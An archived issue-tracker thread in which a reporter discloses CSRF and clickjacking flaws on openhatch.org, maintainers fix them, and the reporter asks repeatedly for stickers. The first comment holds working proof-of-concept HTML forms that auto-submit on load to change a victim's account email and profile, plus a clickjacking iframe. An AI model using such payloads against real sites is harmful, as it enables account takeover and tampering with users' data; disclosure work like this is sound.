CSRF and clickjacking vulnerability at openhatch.org

Comment by pik4chu:

Hey Guys, I found vulnerabilty at your site, Cross-site Request Forgery (CSRF) and Clickjacking vulnerability

Description: Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.

Impact: The impact of this can be anything from creating new data--which may be an outright defacement, contain disinformation or direct users to another malicious website--to deleting or altering existing data.

&lt;html&gt;
&lt;body onload="javascript:document.forms[0].submit()"&gt;
  &lt;body&gt;
    &lt;form action="<a href="http://openhatch.org/account/settings/contact-info/do">http://openhatch.org/account/settings/contact-info/do</a>"
method="POST"&gt;
      &lt;input type="hidden" name="edit&amp;#95;email&amp;#45;email"
value="jeroldcamacho&amp;#46;res&amp;#64;gmail&amp;#46;com" /&gt;
      &lt;input type="submit" value="Submit form" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

&lt;html&gt;
&lt;body onload="javascript:document.forms[0].submit()"&gt;
  &lt;body&gt;
    &lt;form action="<a href="http://openhatch.org/people/info/edit/do">http://openhatch.org/people/info/edit/do</a>" method="POST"&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;bio"
value="Cross&amp;#45;site&amp;#32;Request&amp;#32;Forgery" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;homepage&amp;#95;url" value="" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;irc&amp;#95;nick" value="" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;understands" value="" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;understands&amp;#95;not" value="" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;studying" value="" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;can&amp;#95;pitch&amp;#95;in" value="" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;can&amp;#95;mentor" value="" /&gt;
      &lt;input type="hidden" name="edit&amp;#45;tags&amp;#45;contact&amp;#95;blurb" value="" /&gt;
      &lt;input type="submit" value="Submit form" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

to fix the csrf.. you must add auth token in every html forms at your site :)

I FOUND CLICKJACKING VULNERABILITY TOO

<html><style> iframe { width: 800px; height: 500px; position: absolute; top: 0; left: 0; filter: alpha(opacity=50); opacity: 0.5; }
</style> <iframe src="http://openhatch.org/"></html>

Comment by paulproteus:

I'm surprised we're not using Django's built-in CSRF protection already! pik4chu, thank you for reporting this!

Comment by pik4chu:

Waiting to fixed .. all you need .. is to put csrf token in every forms.. :)

hope i'll get any token of appreciation.. Thanks ma'am !

On Wed, Jan 15, 2014 at 4:27 PM, Asheesh Laroia <bugs@openhatch.org> wrote:

> > Asheesh Laroia <asheesh@asheesh.org> added the comment: > > I'm surprised we're not using Django's built-in CSRF protection already! > pik4chu, thank you for reporting this! > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >

Comment by pik4chu:

https://docs.djangoproject.com/en/dev/ref/contrib/csrf/ https://docs.djangoproject.com/en/dev/ref/clickjacking/#

On Wed, Jan 15, 2014 at 4:47 PM, Jerold Camacho <jeroldcamacho.res@gmail.com > wrote:

> Waiting to fixed .. > all you need .. is to put csrf token in every forms.. :) > > hope i'll get any token of appreciation.. > Thanks ma'am ! > > > On Wed, Jan 15, 2014 at 4:27 PM, Asheesh Laroia <bugs@openhatch.org>wrote: > >> >> Asheesh Laroia <asheesh@asheesh.org> added the comment: >> >> I'm surprised we're not using Django's built-in CSRF protection already! >> pik4chu, thank you for reporting this! >> >> __ >> Roundup issue tracker <bugs@openhatch.org> >> <https://openhatch.org/bugs/issue917> >> __ >> > >

Comment by pik4chu:

hello ma'am Britta.. any reply regarding in this issue?

On Wed, Jan 15, 2014 at 7:45 PM, Jerold Camacho <jeroldcamacho.res@gmail.com > wrote:

> https://docs.djangoproject.com/en/dev/ref/contrib/csrf/ > https://docs.djangoproject.com/en/dev/ref/clickjacking/# > > > On Wed, Jan 15, 2014 at 4:47 PM, Jerold Camacho < > jeroldcamacho.res@gmail.com> wrote: > >> Waiting to fixed .. >> all you need .. is to put csrf token in every forms.. :) >> >> hope i'll get any token of appreciation.. >> Thanks ma'am ! >> >> >> On Wed, Jan 15, 2014 at 4:27 PM, Asheesh Laroia <bugs@openhatch.org>wrote: >> >>> >>> Asheesh Laroia <asheesh@asheesh.org> added the comment: >>> >>> I'm surprised we're not using Django's built-in CSRF protection already! >>> pik4chu, thank you for reporting this! >>> >>> __ >>> Roundup issue tracker <bugs@openhatch.org> >>> <https://openhatch.org/bugs/issue917> >>> __ >>> >> >> >

Comment by paulproteus:

No update yet, we've been very busy, but I hope we'll get to this soon! We're concerned about the impact this can have on users of the site.

Comment by pik4chu:

ma'am Asheesh ? you will give a small token of appreciation?

On Fri, Jan 24, 2014 at 9:59 AM, Asheesh Laroia <bugs@openhatch.org> wrote:

> > Asheesh Laroia <asheesh@asheesh.org> added the comment: > > No update yet, we've been very busy, but I hope we'll get to this soon! > We're concerned about the impact this can have on users of the site. > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >

Comment by brittag:

Hi Jerold, you're listed on the "thanks" page now: http://openhatch.readthedocs.org/en/latest/community/thanks.html

Comment by pik4chu:

even a swag or stickers ma'am?

On Fri, Jan 24, 2014 at 4:26 PM, brittag <bugs@openhatch.org> wrote:

> > brittag <brittag@gmail.com> added the comment: > > Hi Jerold, you're listed on the "thanks" page now: > http://openhatch.readthedocs.org/en/latest/community/thanks.html > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >

Comment by brittag:

Yes, we can put you on the list for stickers! I'll ask you for an address over email later, when we're closer to figuring out logistics for sending stickers. :)

Comment by pik4chu:

how many stickers sir?

On Sat, Jan 25, 2014 at 1:03 PM, brittag <bugs@openhatch.org> wrote:

> > brittag <brittag@gmail.com> added the comment: > > Yes, we can put you on the list for stickers! I'll ask you for an address > over email later, when we're > closer to figuring out logistics for sending stickers. :) > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >

Comment by pik4chu:

i mean ma'am !

On Sat, Jan 25, 2014 at 1:08 PM, Jerold Camacho <jeroldcamacho.res@gmail.com > wrote:

> how many stickers sir? > > > On Sat, Jan 25, 2014 at 1:03 PM, brittag <bugs@openhatch.org> wrote: > >> >> brittag <brittag@gmail.com> added the comment: >> >> Yes, we can put you on the list for stickers! I'll ask you for an address >> over email later, when we're >> closer to figuring out logistics for sending stickers. :) >> >> __ >> Roundup issue tracker <bugs@openhatch.org> >> <https://openhatch.org/bugs/issue917> >> __ >> > >

Comment by bugZPDX:

Submitted pull requests. https://github.com/openhatch/oh-mainline/pull/243

Comment by pik4chu:

Nice sir. But.. How's my gift (the stickers)

On Sunday, April 20, 2014, bugZPDX <bugs@openhatch.org> wrote:

> > bugZPDX <bugz42@gmail.com <javascript:;>> added the comment: > > Submitted pull requests. https://github.com/openhatch/oh-mainline/pull/243 > > ---------- > status: in-progress -> need-review > > __ > Roundup issue tracker <bugs@openhatch.org <javascript:;>> > <https://openhatch.org/bugs/issue917> > __ >

Comment by bugZPDX:

Resubmitted pull request after cleanup suggestions https://github.com/openhatch/oh-mainline/pull/247

Comment by bugZPDX:

Resolved with PR #247 https://github.com/openhatch/oh-mainline/pull/247

Comment by pik4chu:

Hi ??? how's the sticker?

On Fri, May 23, 2014 at 11:45 AM, bugZPDX <bugs@openhatch.org> wrote:

> > bugZPDX <bugz42@gmail.com> added the comment: > > Resolved with PR #247 https://github.com/openhatch/oh-mainline/pull/247 > > ---------- > status: need-review -> resolved > > __ > Roundup issue tracker <bugs@openhatch.org> > <https://openhatch.org/bugs/issue917> > __ >

Comment by ehashman:

As this bug appears to be resolved, and as I am told the stickers are in the mail, I am reducing the priority.

I am also changing the status to 'needs-review', blocking on your receipt of the stickers. Please set this to 'resolved' when they arrive.

Status: need-review Nosy List: brittag, bugZPDX, paulproteus, pik4chu Priority: wish Imported from roundup ID: 917 (view archived page) Last modified: 2014-06-26.04:35:26

openhatch / oh-mainline

CSRF and clickjacking vulnerability at openhatch.org #1232